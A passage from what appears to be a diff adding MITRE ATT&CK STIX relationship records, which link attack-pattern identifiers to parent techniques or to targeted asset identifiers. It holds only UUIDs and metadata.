"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1c88120-5ea0-4d62-93fd-5e3eaaaf1455", + "created": "2024-06-27T09:37:39.960Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:37:39.960Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1c8f729-39a6-4a62-baae-68bb354d1e1f", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1d2df14-6f44-44ac-99c2-3e3f55f53476", + "created": "2023-09-29T16:43:16.472Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:43:16.472Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1d99bbc-8d7c-4263-a909-95a9507b43c3", + "created": "2023-09-29T16:28:17.629Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:28:17.629Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1e24439-2b45-4e75-9450-02e2a85ba961", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1f5234c-f0fb-43cd-ba82-d4fbe562f243", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2040271-2c83-41c3-9b58-9a1f48424d35", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2060c54-5ecf-452c-9ccf-1c635feb1b41", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a221bbb3-5f4f-4879-ae1d-37e8d3022039", + "created": "2023-09-28T21:16:05.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:16:05.517Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a227b22c-6867-47f0-8072-54f76cabd0ea", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a22e57a2-1d94-45eb-bc79-ec7106ae81c6", + "created": "2020-06-09T15:36:04.088Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a23aefa6-15f5-481c-ac3d-09b8e4b3003b", + "created": "2023-09-29T16:44:03.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:44:03.912Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a242480b-9efe-4b91-a253-b62f67f186b5", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a26ba1a3-618f-47bc-8f78-0a4b3728dedd", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a276f020-9642-4608-8520-fca70866c0d9", + "created": "2020-02-20T15:27:18.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2788f0f-70d5-4872-97f8-ce72d5a172b9", + "created": "2020-01-28T13:50:22.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a27a8c63-863e-445d-a006-950e43a5b1e2", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a27e1a69-8a79-4b05-966a-704f430142b4", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2858cec-eca8-4920-80ea-4458c29ec059", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a28594cf-6c4d-4a2e-a3b7-1c64d16f12f0", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a287bc05-20cb-4476-ba1f-15bfde6e601d", + "created": "2023-09-29T18:04:05.993Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:04:05.993Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a28c76bc-06d8-4204-8f17-9f0b4e97b8e5", + "created": "2024-06-26T15:28:56.317Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:28:56.317Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2903e7b-3a2a-431e-9111-6b4245e6c79b", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a299b456-78d0-4cf2-accc-4dfd7b5cd74d", + "created": "2020-10-02T17:08:07.889Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2b365db-b449-4f62-8529-776a14624c41", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2dc6f64-0980-4668-957d-a09538074898", + "created": "2020-10-02T17:08:57.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2f0b9ba-2d6e-43a5-adca-3ec42dba5ce9", + "created": "2023-09-29T16:36:28.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:36:28.818Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2f2733e-fef1-4abf-aca9-5909263396be", + "created": "2024-06-24T19:02:25.744Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T19:02:25.744Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a2fbb0fe-3a76-4e09-a465-6f9c9279b9d0", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3133ede-1ec7-4127-b93b-b0496df073b8", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a31e4c9c-c69d-445e-a669-0b0f6bdaff3e", + "created": "2020-01-31T12:32:08.432Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a31ed7a5-8ed3-46e7-8e3b-32935023e19b", + "created": "2022-09-30T21:18:42.043Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T21:18:42.043Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a33048dc-d843-497c-b8e0-048cc3a08ac7", + "created": "2020-03-19T20:31:11.677Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3376df0-81cf-43bf-be11-c9896ae33d18", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a342ad9a-4179-4190-8080-182afaae08cb", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3795dfa-1be2-4d6a-bb3c-73534bedaf85", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a37dfc98-6d75-4ef6-b6ea-33e8bc08be71", + "created": "2024-06-26T14:32:16.345Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:32:16.345Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3839408-eef4-4099-89c0-fc52ac55e650", + "created": "2020-01-17T16:51:52.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 